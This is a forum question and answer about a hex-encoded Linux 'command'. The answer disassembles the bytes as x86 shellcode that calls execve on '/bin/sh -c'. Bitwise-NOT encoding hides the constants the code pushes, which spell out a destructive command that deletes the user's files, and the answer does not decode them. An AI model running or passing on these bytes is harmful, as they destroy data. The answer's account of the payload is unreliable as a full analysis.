what is hex version of a command , what does it mean in reality , how is this done

Question

I have noticed a command in the form of hex characters and it says this is a hex version of a command (Linux) , what does it actually mean by hex version , How can i convert this to human readable form . As of now i know :

• \ : as an escape sequence
• x : stands for HEX

the command is listed below...

"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00"

But how can i convert this to the original command in English like "XXXXXXXX " .

Answer 1

I took that binary and ran it through hexdump -vC and objdump:

$ objdump -b binary -m i386 -D output 

output:     file format binary


Disassembly of section .data:

00000000 <.data>:
   0:   eb 3e                   jmp    0x40
   2:   5b                      pop    %ebx
   3:   31 c0                   xor    %eax,%eax
   5:   50                      push   %eax
   6:   54                      push   %esp
   7:   5a                      pop    %edx
   8:   83 ec 64                sub    $0x64,%esp
   b:   68 ff ff ff ff          push   $0xffffffff
  10:   68 df d0 df d9          push   $0xd9dfd0df
  15:   68 8d 99 df 81          push   $0x81df998d
  1a:   68 8d 92 df d2          push   $0xd2df928d
  1f:   54                      push   %esp
  20:   5e                      pop    %esi
  21:   f7 16                   notl   (%esi)
  23:   f7 56 04                notl   0x4(%esi)
  26:   f7 56 08                notl   0x8(%esi)
  29:   f7 56 0c                notl   0xc(%esi)
  2c:   83 c4 74                add    $0x74,%esp
  2f:   56                      push   %esi
  30:   8d 73 08                lea    0x8(%ebx),%esi
  33:   56                      push   %esi
  34:   53                      push   %ebx
  35:   54                      push   %esp
  36:   59                      pop    %ecx
  37:   b0 0b                   mov    $0xb,%al
  39:   cd 80                   int    $0x80
  3b:   31 c0                   xor    %eax,%eax
  3d:   40                      inc    %eax
  3e:   eb f9                   jmp    0x39
  40:   e8 bd ff ff ff          call   0x2
  45:   2f                      das    
  46:   62 69 6e                bound  %ebp,0x6e(%ecx)
  49:   2f                      das    
  4a:   73 68                   jae    0xb4
  4c:   00                      .byte 0x0
  4d:   2d                      .byte 0x2d
  4e:   63 00                   arpl   %ax,(%eax)
    ...
$ hexdump -vC output 
00000000  eb 3e 5b 31 c0 50 54 5a  83 ec 64 68 ff ff ff ff  |.>[1.PTZ..dh....|
00000010  68 df d0 df d9 68 8d 99  df 81 68 8d 92 df d2 54  |h....h....h....T|
00000020  5e f7 16 f7 56 04 f7 56  08 f7 56 0c 83 c4 74 56  |^...V..V..V...tV|
00000030  8d 73 08 56 53 54 59 b0  0b cd 80 31 c0 40 eb f9  |.s.VSTY....1.@..|
00000040  e8 bd ff ff ff 2f 62 69  6e 2f 73 68 00 2d 63 00  |...../bin/sh.-c.|
00000050  00                                                |.|
00000051

It does look like some kind of program. First it jumps to offset 0x40 and then uses call 0x2 to set the stack up; then a bunch of operations including a system call. Program data appears to start at offset 0x45 and contains the string "/bin/sh -c".

The system call in question is #11 (mov $0xb,%al), which according to this table is sys_execve. I'd guess it's trying to run a shell. Is this code intended to exploit buffer overflows?